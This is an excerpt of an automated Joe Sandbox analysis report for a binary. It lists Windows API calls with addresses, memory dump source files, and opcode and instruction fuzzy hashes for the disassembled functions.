• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 479098fbe13bdf5decfc09ad931e30a319deeff1f03cf4b6e721c96deed292c8
• Instruction ID: c9265e168c413a1f8fe0f4dda6a37037f0d972c6b14b63f2d8bdd4528363e979
• Opcode Fuzzy Hash: 479098fbe13bdf5decfc09ad931e30a319deeff1f03cf4b6e721c96deed292c8
• Instruction Fuzzy Hash: B4014932617670AADA246274BC46B7F67494F82B34F29021EF8248B9D3DF708EC57290
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C297BA,FF8BC369,00000000,00000002,00000000), ref: 00C29744
• GetLastError.KERNEL32(?,00C297BA,FF8BC369,00000000,00000002,00000000,?,00C25ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C16F41), ref: 00C2974E
• __dosmaperr.LIBCMT ref: 00C29755
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 199e4be606582d4599a5183afe39e34532f264106fcb4bb9c27f17783ef03648
• Instruction ID: 536b3def072108d20f28ca405f8ceca88bedbbea3d905568581c1766c5a03915
• Opcode Fuzzy Hash: 199e4be606582d4599a5183afe39e34532f264106fcb4bb9c27f17783ef03648
• Instruction Fuzzy Hash: 9A01F032630524ABCB159F99FC05DAE7729DF85730F240259F811971D0E671DD919790
APIs
• TranslateMessage.USER32(?), ref: 00BFF27B
• DispatchMessageW.USER32(?), ref: 00BFF289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF29F
• Sleep.KERNEL32(0000000A), ref: 00BFF2B1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00C432D8
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
• Opcode ID: d8c9f7ef2f8807839a6be48b29f854922b7dd4520bb747005ed899ecb0e7dbfc
• Instruction ID: 574064f92774b6364197f3384fed3bd2fc3a0c0c4b9edb7d64a3d77287d3ceb9
• Opcode Fuzzy Hash: d8c9f7ef2f8807839a6be48b29f854922b7dd4520bb747005ed899ecb0e7dbfc
• Instruction Fuzzy Hash: CBF05E306043899BEB30CBA0CC89FEA73ACEF84310F104929F21A830D0DB709588DB25
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C03006
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                            • Opcode ID: 11da11683efd6ee7cad57a2f7cccb102e0330c06da9301180ea50b354ae31256
                                                                                                                                                                                                                                                                            • Instruction ID: 1734a951d2e25051a41b3b3ae4116b784ca493f52922b18ad684a606b049c1e2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11da11683efd6ee7cad57a2f7cccb102e0330c06da9301180ea50b354ae31256
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1922AA706083419FD714DF24C884B2ABBF5BF89314F24895DF4AA8B3A1D771EA85DB42
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 426cac4441aab216020758ee6e2277b0f9f56e4abbadeab155d0766df76e41f5
                                                                                                                                                                                                                                                                            • Instruction ID: b1b19b4ec5f1b7a6e980286420fba0d5e745dcefbcb7506f10b09e095d9d048f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 426cac4441aab216020758ee6e2277b0f9f56e4abbadeab155d0766df76e41f5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF32E370A00215EFCB20DF54C881BAEB7B4FF06314F188559F965AB291DB71EE84EB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00C3413B
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00BF3A76
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                            • Opcode ID: b6f109144af41a896f5609568765ce119b9fa2ff952a994ba3f6944e66671687
                                                                                                                                                                                                                                                                            • Instruction ID: 2a5f2013a8fe46c05efea0150619012eed2e46b8de7eb193f4911a39466886ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f109144af41a896f5609568765ce119b9fa2ff952a994ba3f6944e66671687
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22218171A0025C9BCF15DF98C845BEE7BF8AF49714F008059EA45B7281DBB49A8D8F61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3A3C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                            • Opcode ID: ed872db6e3bf87d7028d7980d3a00f8e5d674cfc5e5266af835d2b52df167ef6
                                                                                                                                                                                                                                                                            • Instruction ID: 6de77e1099c9a97588801baa69f628bef47a52f4971e090f7423730ea9d8edae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed872db6e3bf87d7028d7980d3a00f8e5d674cfc5e5266af835d2b52df167ef6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D23195706047058FD320DF25D884BABBBF8FB49714F00096EEADA87251D7B5AA48CB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 00BF333D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BF32FB
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF3312
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BF3368,?), ref: 00BF33BB
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BF3368,?), ref: 00BF33CE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC2418,00CC2400,?,?,?,?,?,?,00BF3368,?), ref: 00BF343A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF34BB
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00BF3377
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                            • Opcode ID: 02ad77cf6fb62a977b7161a8791c2c065daa03ea2990735dde8e801d661c04eb
                                                                                                                                                                                                                                                                            • Instruction ID: f18810158a8562c496bb25a0a458f0129a74732e35b829fd2fb0961a3b184483
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02ad77cf6fb62a977b7161a8791c2c065daa03ea2990735dde8e801d661c04eb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2F054725543849FD701AF60FC0AF7C37D8A745B09F084866FA05460F2CBBA41949B44
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C0F96C
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFEE50: GetInputState.USER32 ref: 00BFEF07
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C4FB22
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 252777609-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00BFCEEE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C5FCCE
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
APIs
  • Part of subcall function 00BF663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF664A
  • Part of subcall function 00BF663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF665C
  • Part of subcall function 00BF663E: FreeLibrary.KERNEL32(00000000,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF66AB
  • Part of subcall function 00BF6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6610
  • Part of subcall function 00BF6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF6622
  • Part of subcall function 00BF6607: FreeLibrary.KERNEL32(00000000,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6635
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00C24FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C25031
• _free.LIBCMT ref: 00C253DF
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                                                                                                                            • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                            • Instruction ID: 381c7b0ca9a7e157a9b223a69f98e279c9b8dbea1627a945b1d779ae5723dbff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F028B36017047EC7149F28C806FAABB98EB44360F20812AFB19CB1D0DB71E450ABE4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C6F987
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1777cf34032312dc5a679d6161ad8c9271097075c72e506808b89f8a4930ce94
                                                                                                                                                                                                                                                                            • Instruction ID: 4d1c3d33c73176eb0abcfabceb9379ed13393c223ac3c351aea6882d2ddcbcba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1777cf34032312dc5a679d6161ad8c9271097075c72e506808b89f8a4930ce94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F08C72600208BFCB10EBA5DC46EAFB7B8EF4A720F104059F6059B260DA74EE81D760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C2319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C25031
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: cd630fed2f79b75ac29b4fbeca7c9637916a035ca4a155099ca521a4a07614e9
                                                                                                                                                                                                                                                                            • Instruction ID: 1b0d163f56ea7d33b77a5d803320b07706de49a9284bca7e2abb691e54e6b19e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd630fed2f79b75ac29b4fbeca7c9637916a035ca4a155099ca521a4a07614e9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4F0E932510E30A7DB312A27FC45F5B3748AF827F0F148011F825D74A0DA70D90166E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8f06d304d59f728a90f3c471137fc4911d4f03c08993b0fdfda968d626b55d42
                                                                                                                                                                                                                                                                            • Instruction ID: 38776b0060dfac8042f62b2d2156a67b447e0f43e8b6fbd8cb674a7c3465b973
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f06d304d59f728a90f3c471137fc4911d4f03c08993b0fdfda968d626b55d42
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E0E5352006B4A7DA223E72BC01F9A364C9F427A0F1401A0FC25968A0CF38CF42A2E0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d0c66d8321e2064d7421193ee2b7afd90abb45521cfd9cf491413e35b6499c38
                                                                                                                                                                                                                                                                            • Instruction ID: 70922c8c7c6ae3bcba47d6bee26bc1075961afb405d9e52665c39ae7e241d205
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0c66d8321e2064d7421193ee2b7afd90abb45521cfd9cf491413e35b6499c38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F015B1505702DFCB349F64D8A4866BBF4AF14329324897EEAD687610C731A884EF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BF3963
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                            • String ID:
